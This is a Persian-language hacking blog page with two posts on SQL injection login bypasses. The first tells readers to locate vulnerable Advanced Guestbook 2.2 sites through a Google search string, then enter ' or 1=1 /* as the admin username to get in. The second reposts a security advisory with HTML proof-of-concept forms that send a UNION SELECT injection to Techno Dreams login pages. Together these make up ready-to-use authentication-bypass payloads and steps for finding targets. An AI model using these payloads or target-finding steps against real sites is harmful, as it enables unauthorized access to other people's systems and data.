تبليغاتX
Terror Hellish

Terror Hellish

(جنایت جهنمی)

 Advanced Guestbook 2.2 SQL Injection Exploit

سلام دوستان
شما با استفاده از این اکسپولیت GuestBook سایت های Admin.php رو بزنید

در گوگل این رو سرچ کنید >>
powered by admin.php guestbook
یا هر چیز دیگری که میتونه این جور سایت ها رو پیدا کنه .
شکل آدرس سایت هم میتونه به شکل ها ی زیر باشه ( البته این چند نمونش هست )
http://www.example.com/guests/admin.php
http://www.example.com/guestbookludt/admin.php
http://www.example.com/comments/admin.php
و ...........
حالا وقتی وارد این صفحه های لوگین ادمین شدید در قسمت Username فقط
......!
کد:
UserName: ' or 1=1 /*

و در قسمت پسورد هم هیچی ننویسید
موفق باشید
+ نوشته شده در  پنجشنبه بیست و ششم آبان 1384ساعت 17:10  توسط   | 

Techno Dreams Scripts SQL injection

SQL injection

-------

حفره ي جديد در برنامه Techno Dreams توسط كانون پژوهشگران دانش امنيت (تيم امنيتي پرشين هكرز سابق) كشف شد.

تاریخ کشف:
31 مهر 1384

درباره برنامه:
Techno Dreams مجموعه برنامه هايي روي وب است كه شامل Announcement - Guestbook - Mailing List - WebDirectory مي باشد.
برای کسب اطلاعات بیشتر به سایت: Techno Dreams مراجعه کنید.

شرح :
----------------
آسيب پذيري موجود در اين مجموعه برنامه ها به نفوذ گر اين اجازه را مي دهد كه كدها خطرناكي را روي بانك اطلاعاتي اجرا كند در نتيجه مي تواند به اطلاعات پر اهميت دسترسي پيدا كند.

آسیب پذیری :
--------------------

<html>
<h1>Techno Dreams Announcement - Guestbook - WebDirectory Script
Login-Bypass PoC - Kapda `s advisory </h1>
<p> Discovery and exploit by farhadkey [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers
Institute
of Iran</a></p>
<form method="POST" action="http://target/admin/login.asp">
<input type="hidden" name="userid" value="'union all select '1','1'
from admin where ''='">
<input type="hidden" name="passwd" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>

<html>
<h1>Techno Dreams Mailing List Script Login-Bypass PoC - Kapda `s
advisory </h1>
<p> Discovery and exploit by farhadkey [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers
Institute
of Iran</a></p>
<form method="POST" action="http://target/login.asp">
<input type="hidden" name="userid" value="'union all select '1','1'
from admin where ''='">
<input type="hidden" name="passwd" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>



راهکار امنیتی :
--------------------
هيچ راهكار امنيتي درحال حاضر موجود نيست.


اطلاعات بیشتر :
--------------------
http://www.securityfocus.com/archive/1/414708/30/0/threaded
http://www.securityfocus.com/bid/15215

+ نوشته شده در  پنجشنبه پنجم آبان 1384ساعت 10:1  توسط   | 
صفحه نخست
پست الکترونیک
آرشیو وبلاگ
عناوین مطالب وبلاگ

نوشته های پیشین

شهریور 1385
تیر 1385
خرداد 1385
اردیبهشت 1385
فروردین 1385
بهمن 1384
دی 1384
آذر 1384
آبان 1384
مهر 1384
شهریور 1384
مرداد 1384
تیر 1384
 RSS 

POWERED BY
BLOGFA.COM